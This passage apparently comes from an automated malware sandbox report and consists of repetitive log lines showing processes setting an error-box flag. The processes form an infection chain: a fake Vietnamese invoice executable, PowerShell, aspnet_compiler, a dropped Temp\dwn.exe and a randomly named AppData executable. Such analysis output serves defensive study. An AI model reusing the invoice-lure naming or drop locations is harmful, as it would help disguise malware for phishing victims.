Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
